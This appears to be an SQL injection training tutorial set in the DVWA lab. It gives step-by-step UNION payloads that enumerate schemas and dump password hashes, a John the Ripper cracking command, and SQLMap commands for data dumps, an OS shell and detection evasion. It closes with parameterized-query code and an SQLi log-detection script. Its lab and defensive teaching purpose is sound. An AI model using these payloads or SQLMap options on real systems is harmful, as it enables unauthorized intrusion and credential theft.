SQL Injection Tutorial: Complete Lab Guide with DVWA and SQLMap
SQL injection consistently ranks in the OWASP Top 10 and is the most critical vulnerability in web application security. This SQL injection tutorial, built around a practical hands-on lab, gives you a complete understanding of SQLi attacks, from basic concepts to advanced exploitation techniques.
What Is SQL Injection
SQL injection is a code injection technique in which an attacker manipulates database queries through unsanitized user input. The vulnerability arises when an application concatenates user input directly into an SQL query without proper validation.
SQL injection prevention is a top priority for web developers in India, because Indian e-commerce sites, banking portals, and government applications are consistently targeted by SQL injection attacks.
SQL Basics Quick Review
A basic understanding of SQL is necessary before you can understand SQL injection:
SQL databases store data in tables, rows, and columns. SELECT queries retrieve data. INSERT adds new data. UPDATE modifies existing data. DELETE removes data.
A typical vulnerable login query:
```sql
SELECT * FROM users WHERE username='admin' AND password='password123'
```
When user input is concatenated directly into this query without sanitization, the query becomes:
```sql
SELECT * FROM users WHERE username='input_from_user' AND password='input_from_user'
```
This is vulnerable because an attacker can inject special characters through the input.
SQL Injection Types
In-Band SQLi
The most common type, where the same channel is used both to execute the attack and to retrieve data.
Error-Based SQL Injection extracts information from database error messages. Union-Based SQL Injection uses the UNION operator to combine multiple SELECT statements.
Inferential SQLi (Blind SQLi)
No data is transferred directly; conclusions are drawn from response patterns.
Boolean-Based Blind SQLi extracts data from true/false responses. Time-Based Blind SQLi infers data from delays (the SLEEP function).
Out-of-Band SQLi
Uses alternative channels such as DNS or HTTP requests when in-band data retrieval is not possible.
Lab Setup: DVWA on Kali Linux
How to Install DVWA
DVWA (Damn Vulnerable Web Application) is an excellent platform for practice.
Start Apache and MySQL:
```bash
sudo service apache2 start
sudo service mysql start
```
Clone DVWA:
```bash
sudo git clone https://github.com/digininja/DVWA.git /var/www/html/dvwa
```
Set permissions:
```bash
sudo chmod -R 755 /var/www/html/dvwa
```
Set up the config file:
```bash
cd /var/www/html/dvwa/config
cp config.inc.php.dist config.inc.php
```
Open http://localhost/dvwa in the browser and go to the setup page.
Set the DVWA Security Level to "low"; this enables the maximum number of vulnerabilities for practice.
Manual SQL Injection Lab Walkthrough
Open the SQL Injection page in DVWA.
Step 1: Identify the Injection Point
Open the DVWA SQL Injection page in the browser and test the User ID field:
Normal input: 1
Expected output: the user's information is displayed
Single quote test: 1'
If a database error appears, the SQL injection vulnerability is confirmed.
Step 2: Determine the Number of Columns
```sql
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
```
Keep incrementing until an error appears. The last number that succeeds is the column count.
Step 3: Find Vulnerable Columns
```sql
1' UNION SELECT NULL,NULL--
```
If the number of columns does not match, try:
```sql
1' UNION SELECT 1,2,3--
```
The columns whose values are displayed on the screen are the vulnerable ones.
Step 4: Extract Database Information
Database version:
```sql
1' UNION SELECT NULL,@@version--
```
Current database:
```sql
1' UNION SELECT NULL,database()--
```
Current user:
```sql
1' UNION SELECT NULL,user()--
```
Step 5: Enumerate Databases
```sql
1' UNION SELECT schema_name,NULL FROM information_schema.schemata--
```
Step 6: Enumerate Tables
```sql
1' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema='dvwa'--
```
You will probably see a "users" table.
Step 7: Extract Column Names
```sql
1' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
```
You should find the user_id, first_name, last_name, and password columns.
Step 8: Dump User Credentials
```sql
1' UNION SELECT user_id,password FROM users--
```
You will get password hashes, which you can crack with John the Ripper:
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```
SQLMap Automation
SQLMap automates SQL injection and provides powerful features.
Basic SQLMap Scan
```bash
sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --batch
```
The --batch flag enables automatic mode, with no user interaction.
Get Databases
```bash
sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" --dbs
```
Get Tables from a Specific Database
```bash
sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" -D dvwa --tables
```
Get Columns from a Table
```bash
sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" -D dvwa -T users --columns
```
Dump Complete Data
```bash
sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" -D dvwa -T users --dump
```
Gain an OS Shell
```bash
sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" --os-shell
```
SQLMap Advanced Options
- --level=1 to 5 raises the testing level.
- --risk=1 to 3 defines how aggressive the payloads are.
- --random-agent uses a random User-Agent to avoid detection.
- --proxy=http://proxy:8080 runs the scan through a proxy.
- --tamper=space2comment applies bypass techniques.
SQL Injection Prevention
Parameterized Queries (Prepared Statements)
```python
# Vulnerable (never do this): the user input becomes part of the SQL text
query = "SELECT * FROM users WHERE id='" + user_id + "'"
cursor.execute(query)

# Secure (parameterized query): the driver binds user_id as a value, so
# quotes, UNION or -- in the input are never parsed as SQL
query = "SELECT * FROM users WHERE id = ?"
cursor.execute(query, (user_id,))
# Placeholder syntax depends on the driver: ? for sqlite3, %s for
# mysql-connector-python and PyMySQL
```
Input Validation
Use a whitelist approach: allow only the expected characters. Sanitize special characters (', ", ;, --, etc.). Set length limits.
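To show the parameterized query and the whitelist validation from the two passages above working together, here is an added example (not code from the original tutorial or from DVWA). It uses an in-memory SQLite table with constructed rows shaped like the lab's "users" table, and feeds the walkthrough's own User ID probes through a concatenated lookup and a parameterized one so the difference is visible.

```python
import re
import sqlite3

# Constructed sample rows, shaped like the DVWA "users" table in the lab.
SAMPLE_USERS = [
    (1, "admin", "admin", "constructed-hash-1"),
    (2, "Gordon", "Brown", "constructed-hash-2"),
]
# Whitelist for the User ID field: 1 to 10 digits and nothing else.
USER_ID_PATTERN = re.compile(r"[0-9]{1,10}")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT,"
                 " last_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, raw_id):
    # String concatenation, the pattern DVWA 'low' uses: the input becomes SQL.
    query = "SELECT first_name, last_name FROM users WHERE user_id='" + raw_id + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, raw_id):
    # The driver binds raw_id as a value; quotes, UNION and -- stay plain text.
    query = "SELECT first_name, last_name FROM users WHERE user_id=?"
    return conn.execute(query, (raw_id,)).fetchall()


def validate_user_id(raw_id):
    # Reject anything outside the whitelist before it reaches the database.
    if not USER_ID_PATTERN.fullmatch(raw_id):
        raise ValueError("user_id must be 1-10 digits")
    return raw_id


def compare(raw_id):
    """Run one input through both lookups; a database error is returned as text."""
    conn = make_db()
    try:
        vulnerable = lookup_vulnerable(conn, raw_id)
    except sqlite3.Error as exc:
        vulnerable = "error: " + str(exc)
    return {"vulnerable": vulnerable, "parameterized": lookup_parameterized(conn, raw_id)}


if __name__ == "__main__":
    for probe in ("1", "1'", "1' UNION SELECT user_id,password FROM users--"):
        print(repr(probe), compare(probe))
```

The single-quote probe raises a syntax error only on the concatenated query, and the UNION probe returns the password column only there; the parameterized lookup returns nothing for either, and validate_user_id rejects both before a query is built.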
Stored Procedures
Use database-level stored procedures that implement parameterized queries.
Least Privilege Principle
Keep the privileges of the database user that the application uses to a minimum. Allow only the required operations (SELECT, INSERT, UPDATE). DELETE and DROP should be restricted to admin accounts only.
Web Application Firewall (WAF)
A WAF such as ModSecurity can block SQL injection patterns. A WAF provides an additional layer, but the primary prevention is input validation.
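As an added example of the pattern-based detection a WAF or log monitor performs (not ModSecurity's own rules and not code from the tutorial), this script scans constructed Apache access-log lines for the probes used in the walkthrough. The log lines, the indicator list and the finding format are all assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache access-log lines: two benign requests, then the single-quote,
# ORDER BY and UNION probes from the walkthrough as a browser would encode them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1532
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 1530
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 1201
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+ORDER+BY+3--&Submit=Submit HTTP/1.1" 200 1203
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+UNION+SELECT+NULL%2C%40%40version--&Submit=Submit HTTP/1.1" 200 1601
"""

LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Indicators checked against each URL-decoded query parameter value.
INDICATORS = [
    ("quote", re.compile(r"'")),
    ("comment", re.compile(r"--|/\*")),
    ("order_by", re.compile(r"\border\s+by\b", re.I)),
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("info_schema", re.compile(r"information_schema", re.I)),
    ("mysql_var", re.compile(r"@@\w+")),
    ("time_delay", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
]


def classify_param(value):
    """Return the names of all indicators that match one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def scan_log(text):
    """Return one finding per query parameter that matches any indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed line: skip instead of crashing on real logs
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):  # decodes %27, +, %2C
            hits = classify_param(value)
            if hits:
                findings.append({"ip": m.group("ip"), "param": key, "value": value, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Decoding before matching matters: the raw log line contains %27 and %40%40, not the quote or @@ the indicators look for.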
SQL Injection Tutorial Summary
SQL injection is the most dangerous vulnerability in web security. This tutorial covered:
- What SQL injection is and why it is critical
- The different SQL injection types: in-band, inferential, out-of-band
- DVWA lab setup on Kali Linux
- Manual SQL injection exploitation, step by step
- SQLMap automation for faster testing
- Prevention methods: parameterized queries, input validation, least privilege
After working through this SQL injection tutorial, definitely practice in hands-on labs. Besides DVWA, TryHackMe and PortSwigger Academy also have SQL injection challenges. Only perform authorized testing on real-world applications.
Cyber Defence's web application security testing course covers SQL injection and further advanced web vulnerabilities with hands-on labs. You can also practice SQL injection techniques in CTF writeups and Hack The Box challenges.

